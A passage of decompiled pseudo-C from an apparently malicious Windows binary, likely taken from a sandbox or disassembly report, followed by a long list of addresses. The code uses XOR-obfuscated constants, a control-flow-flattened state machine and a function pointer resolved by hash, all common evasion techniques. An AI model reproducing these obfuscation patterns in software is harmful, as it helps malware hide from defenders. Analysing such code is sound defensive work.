                                                                                                                                                                                                                    				_v428 = 0x3514f;
                                                                                                                                                                                                                    				_v428 = _v428 << 0xe;
                                                                                                                                                                                                                    				_v428 = _v428 << 0xe;
                                                                                                                                                                                                                    				_v428 = _v428 ^ 0xf00f549e;
                                                                                                                                                                                                                    				_v436 = 0xcd63;
                                                                                                                                                                                                                    				_v436 = _v436 + 0xffff0a59;
                                                                                                                                                                                                                    				_v436 = _v436 * 0x52;
                                                                                                                                                                                                                    				_v436 = _v436 ^ 0xfff6bc56;
                                                                                                                                                                                                                    				_v440 = 0xf9e49b;
                                                                                                                                                                                                                    				_v440 = _v440 + 0xffff71af;
                                                                                                                                                                                                                    				_v440 = _v440 + 0xffffe51d;
                                                                                                                                                                                                                    				_v440 = _v440 ^ 0x00f24de8;
                                                                                                                                                                                                                    				_v412 = 0xb8e025;
                                                                                                                                                                                                                    				_v412 = _v412 + 0x8bd;
                                                                                                                                                                                                                    				_v412 = _v412 << 2;
                                                                                                                                                                                                                    				_v412 = _v412 ^ 0x02eeff61;
                                                                                                                                                                                                                    				_v528 = 0x4abfc5;
                                                                                                                                                                                                                    				_v528 = _v528 | 0x6dff7f7f;
                                                                                                                                                                                                                    				_v528 = _v528 * 0x62;
                                                                                                                                                                                                                    				_v528 = _v528 ^ 0x1bf8a842;
                                                                                                                                                                                                                    				_v304 = 0x22addc;
                                                                                                                                                                                                                    				_v304 = _v304 >> 8;
                                                                                                                                                                                                                    				_v304 = _v304 ^ 0x00088f19;
                                                                                                                                                                                                                    				_v520 = 0x12d002;
                                                                                                                                                                                                                    				_v520 = _v520 + 0xffffcd8d;
                                                                                                                                                                                                                    				_v520 = _v520 << 4;
                                                                                                                                                                                                                    				_v520 = _v520 + 0x2ed7;
                                                                                                                                                                                                                    				_v520 = _v520 ^ 0x01242e03;
                                                                                                                                                                                                                    				_v344 = 0xad7020;
                                                                                                                                                                                                                    				_v344 = _v344 | 0xb9225ee8;
                                                                                                                                                                                                                    				_v344 = _v344 ^ 0xb9ad2968;
                                                                                                                                                                                                                    				_v352 = 0xc7cf4a;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0x4301855f;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0x43c711fb;
                                                                                                                                                                                                                    				_v356 = 0xc8c86e;
                                                                                                                                                                                                                    				_v356 = _v356 + 0xffff0b98;
                                                                                                                                                                                                                    				_v356 = _v356 ^ 0x00cf81ca;
                                                                                                                                                                                                                    				_v396 = 0xd0f9df;
                                                                                                                                                                                                                    				_t787 = 0x55;
                                                                                                                                                                                                                    				_v396 = _v396 * 0x4f;
                                                                                                                                                                                                                    				_v396 = _v396 >> 9;
                                                                                                                                                                                                                    				_v396 = _v396 ^ 0x0029d1c2;
                                                                                                                                                                                                                    				_v336 = 0xa606cc;
                                                                                                                                                                                                                    				_v336 = _v336 / _t787;
                                                                                                                                                                                                                    				_v336 = _v336 ^ 0x0000c0c6;
                                                                                                                                                                                                                    				_v404 = 0x17b0cb;
                                                                                                                                                                                                                    				_t788 = 0xc;
                                                                                                                                                                                                                    				_v404 = _v404 * 0x26;
                                                                                                                                                                                                                    				_v404 = _v404 * 9;
                                                                                                                                                                                                                    				_v404 = _v404 ^ 0x1fa5c961;
                                                                                                                                                                                                                    				_v512 = 0x66476f;
                                                                                                                                                                                                                    				_v512 = _v512 << 8;
                                                                                                                                                                                                                    				_v512 = _v512 ^ 0x31f1f142;
                                                                                                                                                                                                                    				_v512 = _v512 / _t788;
                                                                                                                                                                                                                    				_v512 = _v512 ^ 0x07467dce;
                                                                                                                                                                                                                    				_v388 = 0xb9001f;
                                                                                                                                                                                                                    				_t789 = 0x1f;
                                                                                                                                                                                                                    				_v388 = _v388 / _t789;
                                                                                                                                                                                                                    				_v388 = _v388 ^ 0x241c6f2c;
                                                                                                                                                                                                                    				_v388 = _v388 ^ 0x2419dfbf;
                                                                                                                                                                                                                    				_v504 = 0x765591;
                                                                                                                                                                                                                    				_v504 = _v504 + 0xffffca08;
                                                                                                                                                                                                                    				_v504 = _v504 * 0x38;
                                                                                                                                                                                                                    				_v504 = _v504 << 0xa;
                                                                                                                                                                                                                    				_v504 = _v504 ^ 0x5ba580de;
                                                                                                                                                                                                                    				_v328 = 0xbd3cc7;
                                                                                                                                                                                                                    				_v328 = _v328 + 0xffffcb39;
                                                                                                                                                                                                                    				_v328 = _v328 ^ 0x00bb4741;
                                                                                                                                                                                                                    				_v448 = 0x81f59d;
                                                                                                                                                                                                                    				_v448 = _v448 + 0xffff9ee3;
                                                                                                                                                                                                                    				_v448 = _v448 << 6;
                                                                                                                                                                                                                    				_v448 = _v448 ^ 0x206c6c13;
                                                                                                                                                                                                                    				_v456 = 0x180242;
                                                                                                                                                                                                                    				_v456 = _v456 << 9;
                                                                                                                                                                                                                    				_v456 = _v456 << 8;
                                                                                                                                                                                                                    				_v456 = _v456 ^ 0x0485a520;
                                                                                                                                                                                                                    				_v380 = 0x966502;
                                                                                                                                                                                                                    				_v380 = _v380 ^ 0x09154ecf;
                                                                                                                                                                                                                    				_v380 = _v380 >> 0xa;
                                                                                                                                                                                                                    				_v380 = _v380 ^ 0x00055ce3;
                                                                                                                                                                                                                    				_v472 = 0xf74a8c;
                                                                                                                                                                                                                    				_v472 = _v472 << 0xe;
                                                                                                                                                                                                                    				_v472 = _v472 >> 9;
                                                                                                                                                                                                                    				_v472 = _v472 * 0x78;
                                                                                                                                                                                                                    				_v472 = _v472 ^ 0x315c9509;
                                                                                                                                                                                                                    				_v480 = 0x9b46b4;
                                                                                                                                                                                                                    				_t790 = 0x79;
                                                                                                                                                                                                                    				_v480 = _v480 / _t790;
                                                                                                                                                                                                                    				_v480 = _v480 + 0xffffeec7;
                                                                                                                                                                                                                    				_v480 = _v480 + 0xffff76f0;
                                                                                                                                                                                                                    				_v480 = _v480 ^ 0x000111f6;
                                                                                                                                                                                                                    				_v488 = 0x730d07;
                                                                                                                                                                                                                    				_v488 = _v488 | 0xec296ec1;
                                                                                                                                                                                                                    				_t791 = 0x69;
                                                                                                                                                                                                                    				_v488 = _v488 / _t791;
                                                                                                                                                                                                                    				_t792 = 6;
                                                                                                                                                                                                                    				_v488 = _v488 / _t792;
                                                                                                                                                                                                                    				_v488 = _v488 ^ 0x006a66a7;
                                                                                                                                                                                                                    				_v496 = 0xd2e4bb;
                                                                                                                                                                                                                    				_v496 = _v496 << 2;
                                                                                                                                                                                                                    				_t793 = 3;
                                                                                                                                                                                                                    				_t706 = _v296;
                                                                                                                                                                                                                    				_t794 = _v296;
                                                                                                                                                                                                                    				_t804 = _v296;
                                                                                                                                                                                                                    				_v496 = _v496 / _t793;
                                                                                                                                                                                                                    				_v496 = _v496 >> 2;
                                                                                                                                                                                                                    				_v496 = _v496 ^ 0x004fd1c8;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					goto L2;
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							L2:
                                                                                                                                                                                                                    							_t812 = _t798 - 0x9d62174;
                                                                                                                                                                                                                    							if(_t812 <= 0) {
                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							__eflags = _t798 - 0xdb129a7;
                                                                                                                                                                                                                    							if(_t798 == 0xdb129a7) {
                                                                                                                                                                                                                    								E00A7056B( *_t711, _v520, _t706,  *((intOrPtr*)(_t711 + 4)), _v344, _v352, _v356);
                                                                                                                                                                                                                    								_t711 = _v464;
                                                                                                                                                                                                                    								_t805 =  &(_t805[5]);
                                                                                                                                                                                                                    								_t798 = 0x116795c;
                                                                                                                                                                                                                    								_t655 = 0xfa7d822;
                                                                                                                                                                                                                    								_t706 = _t706 +  *((intOrPtr*)(_t711 + 4));
                                                                                                                                                                                                                    								__eflags = _t706;
                                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								__eflags = _t798 - 0xe8e0be0;
                                                                                                                                                                                                                    								if(_t798 == 0xe8e0be0) {
                                                                                                                                                                                                                    									E00A76A6B(_v300, _v472, _v480, _v488, _v496);
                                                                                                                                                                                                                    									return 0;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t798 - 0xf928600;
                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                    									_t798 = 0xfeaa205;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									__eflags = _t798 - _t655;
                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                    										_push(0xa61834);
                                                                                                                                                                                                                    										_push(_v332);
                                                                                                                                                                                                                    										_push(_v312);
                                                                                                                                                                                                                    										_v292 = _t794 + _t804;
                                                                                                                                                                                                                    										_t695 = E00A7AF4E(_v384, _v324, __eflags);
                                                                                                                                                                                                                    										_t706 = E00A62A22(_t804, _v536, _v420,  &_v288, _t794 + _t804 - _t804,  &_v128,  &_v256, _v428, _v436, _v440) + _t804;
                                                                                                                                                                                                                    										E00A7D6DF(_v412, _t695, _v528, _v304);
                                                                                                                                                                                                                    										_t805 =  &(_t805[0xe]);
                                                                                                                                                                                                                    										_t798 = 0xdb129a7;
                                                                                                                                                                                                                    										goto L10;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										__eflags = _t798 - 0xfeaa205;
                                                                                                                                                                                                                    										if(_t798 != 0xfeaa205) {
                                                                                                                                                                                                                    											goto L27;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_push(_t711);
                                                                                                                                                                                                                    											_push(_t711);
                                                                                                                                                                                                                    											_push(1);
                                                                                                                                                                                                                    											_t730 = 8;
                                                                                                                                                                                                                    											_t794 = E00A75103(_t730);
                                                                                                                                                                                                                    											E00A7CD47(_v408,  &_v288, _t794, _v544, 9, _v376);
                                                                                                                                                                                                                    											_t805 =  &(_t805[7]);
                                                                                                                                                                                                                    											_t798 = 0xd70683;
                                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                                    											_t711 = _v464;
                                                                                                                                                                                                                    											goto L1;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t812 == 0) {
                                                                                                                                                                                                                    							_t800 =  &_v256;
                                                                                                                                                                                                                    							_push(_t711);
                                                                                                                                                                                                                    							_push(_t711);
                                                                                                                                                                                                                    							_push(8);
                                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                    							_t766 = E00A75103(0);
                                                                                                                                                                                                                    							_t807 =  &(_t805[3]);
                                                                                                                                                                                                                    							_t662 = _v368;
                                                                                                                                                                                                                    							__eflags = _t662 - _t766;
                                                                                                                                                                                                                    							if(_t662 < _t766) {
                                                                                                                                                                                                                    								_t779 = _t766 - _t662;
                                                                                                                                                                                                                    								_t795 = _t800;
                                                                                                                                                                                                                    								_t733 = _t779 >> 1;
                                                                                                                                                                                                                    								__eflags = _t733;
                                                                                                                                                                                                                    								_t669 = memset(_t795, 0x2d002d, _t733 << 2);
                                                                                                                                                                                                                    								asm("adc ecx, ecx");
                                                                                                                                                                                                                    								_t800 = _t800 + _t779 * 2;
                                                                                                                                                                                                                    								memset(_t795 + _t733, _t669, 0);
                                                                                                                                                                                                                    								_t807 =  &(_t807[6]);
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                    							_push(8);
                                                                                                                                                                                                                    							_t715 = 0x10;
                                                                                                                                                                                                                    							_t794 = E00A75103(_t715);
                                                                                                                                                                                                                    							E00A7CD47(_v556, _t800, _t794, _v424, 0xb, _v320);
                                                                                                                                                                                                                    							_t805 =  &(_t807[7]);
                                                                                                                                                                                                                    							_t798 = 0x9394b01;
                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t798 == 0x5ff599) {
                                                                                                                                                                                                                    							_t794 = _t794 +  *((intOrPtr*)(_t711 + 4));
                                                                                                                                                                                                                    							_t804 = E00A7C6D9(_t794);
                                                                                                                                                                                                                    							__eflags = _t804;
                                                                                                                                                                                                                    							_t655 = 0xfa7d822;
                                                                                                                                                                                                                    							_t711 = _v464;
                                                                                                                                                                                                                    							_t798 =  !=  ? 0xfa7d822 : 0xe8e0be0;
                                                                                                                                                                                                                    							goto L2;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t798 == 0xd70683) {
                                                                                                                                                                                                                    							_push(_t711);
                                                                                                                                                                                                                    							_push(_t711);
                                                                                                                                                                                                                    							_push(4);
                                                                                                                                                                                                                    							_t718 = 0x10;
                                                                                                                                                                                                                    							_t794 = E00A75103(_t718);
                                                                                                                                                                                                                    							E00A7CD47(_v348,  &_v128, _t794, _v316, 0xb, _v524);
                                                                                                                                                                                                                    							_t805 =  &(_t805[7]);
                                                                                                                                                                                                                    							_t798 = 0x9d62174;
                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t798 == 0x116795c) {
                                                                                                                                                                                                                    							_push(0xa61794);
                                                                                                                                                                                                                    							_push(_v512);
                                                                                                                                                                                                                    							_push(_v404);
                                                                                                                                                                                                                    							_t683 = E00A6B77A(E00A7AF4E(_v396, _v336, __eflags), _v504, _t706, _v292 - _t706,  &_v256, _v328);
                                                                                                                                                                                                                    							E00A7D6DF(_v448, _t679, _v456, _v380);
                                                                                                                                                                                                                    							_t685 = _v296;
                                                                                                                                                                                                                    							 *_t685 = _t804;
                                                                                                                                                                                                                    							 *((intOrPtr*)(_t685 + 4)) = _t706 + _t683 - _t804;
                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t798 != 0x9394b01) {
                                                                                                                                                                                                                    							_t817 = _t798 - 0x9a77c45;
                                                                                                                                                                                                                    							if(_t798 != 0x9a77c45) {
                                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_push(_v508);
                                                                                                                                                                                                                    								_push(_v416);
                                                                                                                                                                                                                    								_push(_v548);
                                                                                                                                                                                                                    								_t690 = E00A81E60(0xa617f4, _v484, _t817);
                                                                                                                                                                                                                    								_push( &_v256);
                                                                                                                                                                                                                    								_push(_t690);
                                                                                                                                                                                                                    								_push(_t794);
                                                                                                                                                                                                                    								_push(_v300);
                                                                                                                                                                                                                    								 *((intOrPtr*)(E00A7D5E0(0xa617f4, 0x988428b1, 0x180)))();
                                                                                                                                                                                                                    								E00A7D6DF(_v372, _t690, _v540, _v452);
                                                                                                                                                                                                                    								_t805 =  &(_t805[9]);
                                                                                                                                                                                                                    								_t798 = 0x5ff599;
                                                                                                                                                                                                                    								goto L10;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t794 = 0x4000;
                                                                                                                                                                                                                    						_t689 = E00A7C6D9(0x4000);
                                                                                                                                                                                                                    						_v300 = _t689;
                                                                                                                                                                                                                    						__eflags = _t689;
                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                    							_t798 = 0x9a77c45;
                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						return _t689;
                                                                                                                                                                                                                    						goto L32;
                                                                                                                                                                                                                    						L27:
                                                                                                                                                                                                                    						__eflags = _t798 - 0x9fa6c44;
                                                                                                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                                                                                                    					return _v300;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}















































































































                                                                                                                                                                                                                    0x00a7b587
                                                                                                                                                                                                                    0x00a7b587
                                                                                                                                                                                                                    0x00a7b58d
                                                                                                                                                                                                                    0x00a7b598
                                                                                                                                                                                                                    0x00a7b5a0
                                                                                                                                                                                                                    0x00a7b5ab
                                                                                                                                                                                                                    0x00a7b5b6
                                                                                                                                                                                                                    0x00a7b5be
                                                                                                                                                                                                                    0x00a7b5ce
                                                                                                                                                                                                                    0x00a7b5d5
                                                                                                                                                                                                                    0x00a7b5de
                                                                                                                                                                                                                    0x00a7b5e2
                                                                                                                                                                                                                    0x00a7b5e7
                                                                                                                                                                                                                    0x00a7b5ed
                                                                                                                                                                                                                    0x00a7b5f5
                                                                                                                                                                                                                    0x00a7b5fd
                                                                                                                                                                                                                    0x00a7b605
                                                                                                                                                                                                                    0x00a7b60d
                                                                                                                                                                                                                    0x00a7b612
                                                                                                                                                                                                                    0x00a7b61a
                                                                                                                                                                                                                    0x00a7b625
                                                                                                                                                                                                                    0x00a7b630
                                                                                                                                                                                                                    0x00a7b638
                                                                                                                                                                                                                    0x00a7b643
                                                                                                                                                                                                                    0x00a7b64e
                                                                                                                                                                                                                    0x00a7b661
                                                                                                                                                                                                                    0x00a7b662
                                                                                                                                                                                                                    0x00a7b669
                                                                                                                                                                                                                    0x00a7b674
                                                                                                                                                                                                                    0x00a7b681
                                                                                                                                                                                                                    0x00a7b685
                                                                                                                                                                                                                    0x00a7b68f
                                                                                                                                                                                                                    0x00a7b693
                                                                                                                                                                                                                    0x00a7b69b
                                                                                                                                                                                                                    0x00a7b6a6
                                                                                                                                                                                                                    0x00a7b6b1
                                                                                                                                                                                                                    0x00a7b6bc
                                                                                                                                                                                                                    0x00a7b6c7
                                                                                                                                                                                                                    0x00a7b6cf
                                                                                                                                                                                                                    0x00a7b6d7
                                                                                                                                                                                                                    0x00a7b6e1
                                                                                                                                                                                                                    0x00a7b6e5
                                                                                                                                                                                                                    0x00a7b6ed
                                                                                                                                                                                                                    0x00a7b6f8
                                                                                                                                                                                                                    0x00a7b703
                                                                                                                                                                                                                    0x00a7b70e
                                                                                                                                                                                                                    0x00a7b716
                                                                                                                                                                                                                    0x00a7b71b
                                                                                                                                                                                                                    0x00a7b723
                                                                                                                                                                                                                    0x00a7b728
                                                                                                                                                                                                                    0x00a7b730
                                                                                                                                                                                                                    0x00a7b73b
                                                                                                                                                                                                                    0x00a7b743
                                                                                                                                                                                                                    0x00a7b74e
                                                                                                                                                                                                                    0x00a7b759
                                                                                                                                                                                                                    0x00a7b761
                                                                                                                                                                                                                    0x00a7b76c
                                                                                                                                                                                                                    0x00a7b779
                                                                                                                                                                                                                    0x00a7b77d
                                                                                                                                                                                                                    0x00a7b78b
                                                                                                                                                                                                                    0x00a7b78f
                                                                                                                                                                                                                    0x00a7b797
                                                                                                                                                                                                                    0x00a7b7a2
                                                                                                                                                                                                                    0x00a7b7b1
                                                                                                                                                                                                                    0x00a7b7b8
                                                                                                                                                                                                                    0x00a7b7c3
                                                                                                                                                                                                                    0x00a7b7d0
                                                                                                                                                                                                                    0x00a7b7d8
                                                                                                                                                                                                                    0x00a7b7e3
                                                                                                                                                                                                                    0x00a7b7eb
                                                                                                                                                                                                                    0x00a7b7f3
                                                                                                                                                                                                                    0x00a7b801
                                                                                                                                                                                                                    0x00a7b806
                                                                                                                                                                                                                    0x00a7b80c
                                                                                                                                                                                                                    0x00a7b814
                                                                                                                                                                                                                    0x00a7b821
                                                                                                                                                                                                                    0x00a7b822
                                                                                                                                                                                                                    0x00a7b826
                                                                                                                                                                                                                    0x00a7b82e
                                                                                                                                                                                                                    0x00a7b836
                                                                                                                                                                                                                    0x00a7b83e
                                                                                                                                                                                                                    0x00a7b846
                                                                                                                                                                                                                    0x00a7b84e
                                                                                                                                                                                                                    0x00a7b853
                                                                                                                                                                                                                    0x00a7b858
                                                                                                                                                                                                                    0x00a7b860
                                                                                                                                                                                                                    0x00a7b874
                                                                                                                                                                                                                    0x00a7b87b
                                                                                                                                                                                                                    0x00a7b886
                                                                                                                                                                                                                    0x00a7b893
                                                                                                                                                                                                                    0x00a7b897
                                                                                                                                                                                                                    0x00a7b89f
                                                                                                                                                                                                                    0x00a7b8a4
                                                                                                                                                                                                                    0x00a7b8ac
                                                                                                                                                                                                                    0x00a7b8b7
                                                                                                                                                                                                                    0x00a7b8bf
                                                                                                                                                                                                                    0x00a7b8ca
                                                                                                                                                                                                                    0x00a7b8d5
                                                                                                                                                                                                                    0x00a7b8e0
                                                                                                                                                                                                                    0x00a7b8e8
                                                                                                                                                                                                                    0x00a7b8f3
                                                                                                                                                                                                                    0x00a7b906
                                                                                                                                                                                                                    0x00a7b915
                                                                                                                                                                                                                    0x00a7b91c
                                                                                                                                                                                                                    0x00a7b927
                                                                                                                                                                                                                    0x00a7b92f
                                                                                                                                                                                                                    0x00a7b937
                                                                                                                                                                                                                    0x00a7b93c
                                                                                                                                                                                                                    0x00a7b941
                                                                                                                                                                                                                    0x00a7b949
                                                                                                                                                                                                                    0x00a7b951
                                                                                                                                                                                                                    0x00a7b959
                                                                                                                                                                                                                    0x00a7b961
                                                                                                                                                                                                                    0x00a7b969
                                                                                                                                                                                                                    0x00a7b971
                                                                                                                                                                                                                    0x00a7b979
                                                                                                                                                                                                                    0x00a7b97e
                                                                                                                                                                                                                    0x00a7b986
                                                                                                                                                                                                                    0x00a7b98e
                                                                                                                                                                                                                    0x00a7b999
                                                                                                                                                                                                                    0x00a7b9a4
                                                                                                                                                                                                                    0x00a7b9ac
                                                                                                                                                                                                                    0x00a7b9b7
                                                                                                                                                                                                                    0x00a7b9bf
                                                                                                                                                                                                                    0x00a7b9c7
                                                                                                                                                                                                                    0x00a7b9d1
                                                                                                                                                                                                                    0x00a7b9d5
                                                                                                                                                                                                                    0x00a7b9dd
                                                                                                                                                                                                                    0x00a7b9e8
                                                                                                                                                                                                                    0x00a7b9f8
                                                                                                                                                                                                                    0x00a7b9ff
                                                                                                                                                                                                                    0x00a7ba0a
                                                                                                                                                                                                                    0x00a7ba12
                                                                                                                                                                                                                    0x00a7ba1c
                                                                                                                                                                                                                    0x00a7ba21
                                                                                                                                                                                                                    0x00a7ba26
                                                                                                                                                                                                                    0x00a7ba2e
                                                                                                                                                                                                                    0x00a7ba36
                                                                                                                                                                                                                    0x00a7ba3e
                                                                                                                                                                                                                    0x00a7ba46
                                                                                                                                                                                                                    0x00a7ba4e
                                                                                                                                                                                                                    0x00a7ba62
                                                                                                                                                                                                                    0x00a7ba67
                                                                                                                                                                                                                    0x00a7ba70
                                                                                                                                                                                                                    0x00a7ba7b
                                                                                                                                                                                                                    0x00a7ba86
                                                                                                                                                                                                                    0x00a7ba91
                                                                                                                                                                                                                    0x00a7ba9c
                                                                                                                                                                                                                    0x00a7baa7
                                                                                                                                                                                                                    0x00a7bab2
                                                                                                                                                                                                                    0x00a7bac5
                                                                                                                                                                                                                    0x00a7bac8
                                                                                                                                                                                                                    0x00a7bacf
                                                                                                                                                                                                                    0x00a7bada
                                                                                                                                                                                                                    0x00a7bae5
                                                                                                                                                                                                                    0x00a7bafb
                                                                                                                                                                                                                    0x00a7bb02
                                                                                                                                                                                                                    0x00a7bb0d
                                                                                                                                                                                                                    0x00a7bb18
                                                                                                                                                                                                                    0x00a7bb23
                                                                                                                                                                                                                    0x00a7bb2e
                                                                                                                                                                                                                    0x00a7bb39
                                                                                                                                                                                                                    0x00a7bb44
                                                                                                                                                                                                                    0x00a7bb4f
                                                                                                                                                                                                                    0x00a7bb57
                                                                                                                                                                                                                    0x00a7bb5f
                                                                                                                                                                                                                    0x00a7bb64
                                                                                                                                                                                                                    0x00a7bb69
                                                                                                                                                                                                                    0x00a7bb71
                                                                                                                                                                                                                    0x00a7bb7c
                                                                                                                                                                                                                    0x00a7bb8e
                                                                                                                                                                                                                    0x00a7bb91
                                                                                                                                                                                                                    0x00a7bb98
                                                                                                                                                                                                                    0x00a7bba3
                                                                                                                                                                                                                    0x00a7bbae
                                                                                                                                                                                                                    0x00a7bbb6
                                                                                                                                                                                                                    0x00a7bbbe
                                                                                                                                                                                                                    0x00a7bbc9
                                                                                                                                                                                                                    0x00a7bbd4
                                                                                                                                                                                                                    0x00a7bbe7
                                                                                                                                                                                                                    0x00a7bbee
                                                                                                                                                                                                                    0x00a7bbf9
                                                                                                                                                                                                                    0x00a7bc04
                                                                                                                                                                                                                    0x00a7bc0f
                                                                                                                                                                                                                    0x00a7bc1a
                                                                                                                                                                                                                    0x00a7bc25
                                                                                                                                                                                                                    0x00a7bc30
                                                                                                                                                                                                                    0x00a7bc3b
                                                                                                                                                                                                                    0x00a7bc43
                                                                                                                                                                                                                    0x00a7bc4e
                                                                                                                                                                                                                    0x00a7bc56
                                                                                                                                                                                                                    0x00a7bc63
                                                                                                                                                                                                                    0x00a7bc67
                                                                                                                                                                                                                    0x00a7bc6f
                                                                                                                                                                                                                    0x00a7bc7a
                                                                                                                                                                                                                    0x00a7bc82
                                                                                                                                                                                                                    0x00a7bc8d
                                                                                                                                                                                                                    0x00a7bc95
                                                                                                                                                                                                                    0x00a7bc9d
                                                                                                                                                                                                                    0x00a7bca4
                                                                                                                                                                                                                    0x00a7bcac
                                                                                                                                                                                                                    0x00a7bcb4
                                                                                                                                                                                                                    0x00a7bcbf
                                                                                                                                                                                                                    0x00a7bcca
                                                                                                                                                                                                                    0x00a7bcd5
                                                                                                                                                                                                                    0x00a7bce0
                                                                                                                                                                                                                    0x00a7bceb
                                                                                                                                                                                                                    0x00a7bcf6
                                                                                                                                                                                                                    0x00a7bd01
                                                                                                                                                                                                                    0x00a7bd0c
                                                                                                                                                                                                                    0x00a7bd17
                                                                                                                                                                                                                    0x00a7bd2c
                                                                                                                                                                                                                    0x00a7bd2f
                                                                                                                                                                                                                    0x00a7bd36
                                                                                                                                                                                                                    0x00a7bd3e
                                                                                                                                                                                                                    0x00a7bd49
                                                                                                                                                                                                                    0x00a7bd5f
                                                                                                                                                                                                                    0x00a7bd66
                                                                                                                                                                                                                    0x00a7bd71
                                                                                                                                                                                                                    0x00a7bd84
                                                                                                                                                                                                                    0x00a7bd87
                                                                                                                                                                                                                    0x00a7bd96
                                                                                                                                                                                                                    0x00a7bd9d
                                                                                                                                                                                                                    0x00a7bda8
                                                                                                                                                                                                                    0x00a7bdb0
                                                                                                                                                                                                                    0x00a7bdb5
                                                                                                                                                                                                                    0x00a7bdc5
                                                                                                                                                                                                                    0x00a7bdc9
                                                                                                                                                                                                                    0x00a7bdd1
                                                                                                                                                                                                                    0x00a7bde3
                                                                                                                                                                                                                    0x00a7bde8
                                                                                                                                                                                                                    0x00a7bdef
                                                                                                                                                                                                                    0x00a7bdfa
                                                                                                                                                                                                                    0x00a7be05
                                                                                                                                                                                                                    0x00a7be0d
                                                                                                                                                                                                                    0x00a7be1a
                                                                                                                                                                                                                    0x00a7be1e
                                                                                                                                                                                                                    0x00a7be23
                                                                                                                                                                                                                    0x00a7be2b
                                                                                                                                                                                                                    0x00a7be36
                                                                                                                                                                                                                    0x00a7be41
                                                                                                                                                                                                                    0x00a7be4c
                                                                                                                                                                                                                    0x00a7be57
                                                                                                                                                                                                                    0x00a7be62
                                                                                                                                                                                                                    0x00a7be6a
                                                                                                                                                                                                                    0x00a7be75
                                                                                                                                                                                                                    0x00a7be7d
                                                                                                                                                                                                                    0x00a7be82
                                                                                                                                                                                                                    0x00a7be87
                                                                                                                                                                                                                    0x00a7be8f
                                                                                                                                                                                                                    0x00a7be9a
                                                                                                                                                                                                                    0x00a7bea5
                                                                                                                                                                                                                    0x00a7bead
                                                                                                                                                                                                                    0x00a7beb8
                                                                                                                                                                                                                    0x00a7bec0
                                                                                                                                                                                                                    0x00a7bec5
                                                                                                                                                                                                                    0x00a7becf
                                                                                                                                                                                                                    0x00a7bed3
                                                                                                                                                                                                                    0x00a7bedd
                                                                                                                                                                                                                    0x00a7bee9
                                                                                                                                                                                                                    0x00a7beee
                                                                                                                                                                                                                    0x00a7bef4
                                                                                                                                                                                                                    0x00a7befc
                                                                                                                                                                                                                    0x00a7bf04
                                                                                                                                                                                                                    0x00a7bf0c
                                                                                                                                                                                                                    0x00a7bf14
                                                                                                                                                                                                                    0x00a7bf20
                                                                                                                                                                                                                    0x00a7bf25
                                                                                                                                                                                                                    0x00a7bf2f
                                                                                                                                                                                                                    0x00a7bf34
                                                                                                                                                                                                                    0x00a7bf3a
                                                                                                                                                                                                                    0x00a7bf42
                                                                                                                                                                                                                    0x00a7bf4a
                                                                                                                                                                                                                    0x00a7bf53
                                                                                                                                                                                                                    0x00a7bf56
                                                                                                                                                                                                                    0x00a7bf5d
                                                                                                                                                                                                                    0x00a7bf64
                                                                                                                                                                                                                    0x00a7bf6b
                                                                                                                                                                                                                    0x00a7bf6f
                                                                                                                                                                                                                    0x00a7bf74
                                                                                                                                                                                                                    0x00a7bf7c
                                                                                                                                                                                                                    0x00a7bf7c
                                                                                                                                                                                                                    0x00a7bf7c
                                                                                                                                                                                                                    0x00a7bf81
                                                                                                                                                                                                                    0x00a7bf81
                                                                                                                                                                                                                    0x00a7bf81
                                                                                                                                                                                                                    0x00a7bf81
                                                                                                                                                                                                                    0x00a7bf87
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c173
                                                                                                                                                                                                                    0x00a7c179
                                                                                                                                                                                                                    0x00a7c2ba
                                                                                                                                                                                                                    0x00a7c2bf
                                                                                                                                                                                                                    0x00a7c2c6
                                                                                                                                                                                                                    0x00a7c2c9
                                                                                                                                                                                                                    0x00a7c2ce
                                                                                                                                                                                                                    0x00a7c2d3
                                                                                                                                                                                                                    0x00a7c2d3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7c17f
                                                                                                                                                                                                                    0x00a7c17f
                                                                                                                                                                                                                    0x00a7c185
